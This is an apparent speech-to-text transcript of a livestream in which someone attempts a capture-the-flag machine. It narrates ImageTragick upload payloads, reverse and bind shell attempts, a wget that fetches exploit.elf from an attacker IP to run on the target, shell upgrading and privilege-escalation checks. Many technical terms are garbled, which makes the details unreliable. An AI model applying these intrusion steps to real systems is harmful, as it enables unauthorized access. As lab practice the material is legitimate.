Exploit 1. And then just do exploit 2. Re-listen again and see. You know, I can try. Here's what we'll try. We'll try doing something, maybe with these quotes. Okay, exploit 3. So what I'm hoping will happen is we'll see if we can execute anything using this bash thing, then this will make our lives a lot easier. Oh, hang on. Forgot that. Please work. No. Okay, so we can't do stuff like that. Yeah, we can try those in a minute. Okay, that that worked if I do this, I think. Exploit 6. Yes, okay. We can execute anything in Bash now. This makes it a lot easier to do the rev shell stuff. Because we can just put this in quotes now, and I think that was probably what was fucking everything up. So if I shovel this here, I'm pretty sure... Yeah, we get a connection back, it just dies immediately. Which... I wonder if we just pipe it into sleep for a long time. Or background it. Let's try that. We'll get command execution. Yeah, it's just freaking dying. Why is it dying? I guess now, though, I can... We could try the mod 777 temp exploit.elf. We need to do that, though. And then can we just run... Oops. Matrix does a touch afterwards, like... Okay, interesting. So we just... So we pipe it into touch. Oh, matching up the quotes. Oh, I see. Okay, that's kind of interesting. Alright, see if this helps. Nope. This is really annoying. Ages ago, SSH didn't even come up in the scan. It was FTP. Fucking hell! Come on. I guess we could just run something else. We could do the... We could do this now. This might work. Could try a bind shell, I know, but the problem... I don't know what the problem is, honestly, but... Oh, I didn't fucking change the file name. 9. Oh, I probably didn't change the file name that time either. I don't know what's going on here either. This is... Shit. Slash L. Exploit 10, please. Okay, that worked. Why didn't the other one work? Try bin bash. Exploit 11. Possible that NC isn't even installed. What about Python? I don't really want to do that. That's kind of confusing as fuck. There's no reason why our exploit.elf thing shouldn't work, to be honest with you. So maybe we'll just try that again. I'm just going to call it E1. So we're just going to use all these bash commands now. wget -o temp /exploit.elf http 10 132135 8000 exploit.elf. Okay. And if we do E2 and we do a chmod, this, that should work. And then if we do an E3 and then just run it, nothing. Although maybe it should, no. Not even if we do this, does it work, does it? No. Can we get like a sleep working? Can't even get sleep work. So this is running asynchronously, basically. We may have to leave this for another time. I didn't expect it to take this long. There's just something stupid going on with the connections. Yeah, I mean, it got it that time, but... Alright, we'll try payload other things, but that's it. Because, you know, it's getting late for me, and I have things to do as well. I mean, yeah, it's weird that 4444 is doomed. Maybe we can try another port, but, Image tragic, come on. There's only one comet. Okay. This is PowerShell though. Are we sure it's a No, it's running bash. This isn't gonna work. This is... Oh, hang on, this is Ubuntu. What? No, it's ID. I don't know why they say it's PowerShell. It's clearly not PowerShell, is it? Okay, we'll copy all of that. I'm just going to name it A1. We're going to go for the A's now. So if we do this... What do we have to... I wish I knew where this fucking thing was. Okay, it's there. I don't want the frickin'... I want the page! Upload insecure files, come on. Image tragic. I mean, yeah, this didn't work. Where did you see this one then? Because this is the only one I can see now. And it's the exact same one that we have. We've already tried this. More payload in the folder, picture image magic. Okay. Oh, okay. There we go. Well, that's annoying. Okay, we'll do that. So the question is, can we just put anything in here? If this doesn't work, we're just going to call it a night, because No, didn't work. We can try another port, but if it's my port, if it is my port 4444, I have no idea what's going on. No, okay. Oh, hang on, A2. I need to rename it, of course. Yeah. All right. We'll have to wrap this up another time. This is definitely not an easy box, though. I don't know why they put it in absurd, so I'm going to downvote it because it shouldn't be an easy. It's definitely it's probably a medium. No what? Oh right, yeah, no, it's really. Oh, hang on, did I mess up the? Well, they said it's a JPEG. I'll set it as a JPEG then. Hang on. We'll do one more time. A3.jpg. Oh, I didn't even freaking have a listener set. That's fun. A4. Yeah, nothing. All right. No, we tried V1. I'm serious. Like this is the one we tried at the very beginning. I mean, sure, why not? But it didn't work at the very beginning. I don't know why it'll work now. Did I need to use MVG again? Probably. I'll try it. Fuck it. Again. Dumbass exploit. So put all this in. Do I need just... Okay, I probably should put bin bash. 9001. Fuck's sake. I swear to God we tried this. Oh, wow. Alright. It's not the port. No, it's not. Because I swear I'll do it on port 4444. See, it's not the port. Do we have a Python now? We do. Let's see if we can just speed run this then, I guess. Alright, extract, Control Z, STTY, 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 calls 172 rows 39. Sport term equals X. Oh, jeez, my finger. Ow. Alright. We're in a freaking temp directory. Yeah, I can't even... Yeah, my thing isn't even here. My exploit wasn't even there. Where are we? Home. CD Magician. Can't use .txt. .yxy would be great. Okay. Sim hex, no idea what that means. All right, let's try a sudo. Okay, nothing in sudo. Let's try an suid. If it's not really simple, we'll do it next time. We'll just get the Provesk again. I mean, it's Polkit. It could be fucking Polkit. What groups are we in? Nothing. Anything in opt? Nope. I don't know. HTML, come on, anything in here interesting? No, that's just the index crap. Oh, hang on, Spring Boot Magician backend snapshot. What is that? Oh, the magic continues. Probably should cap that, right? Okay, yeah, this is going to be a ridiculous one. Alright, we're going to end it there. There's something we've got to exploit on the box for service of some kind. Probably custom. Lovely. Alright. That's it. We'll do that one again at some point. Alright. I'm well over. But there's my stream ending. Please follow me on Twitter. Please join the Discord server. Subscribe to my YouTube channel. And give me a follow on Twitch. Hopefully I'll be streaming on Wednesday. I'm not sure, but yeah. Thank you for everybody for joining. Sorry the last box was not easy. I really hate when that happens because, you know, this is supposed to be the easy stream. And honestly, I didn't think I taught anything during that bit because it was more of a Frustration Friday stream than anything. But anyway, thanks for stopping by. Let's find someone to raid, actually, if there's anybody online. Hate Handles is online, I guess. We can raid him. Alright. Thank you so much again for joining. I'll see you next time. Peace.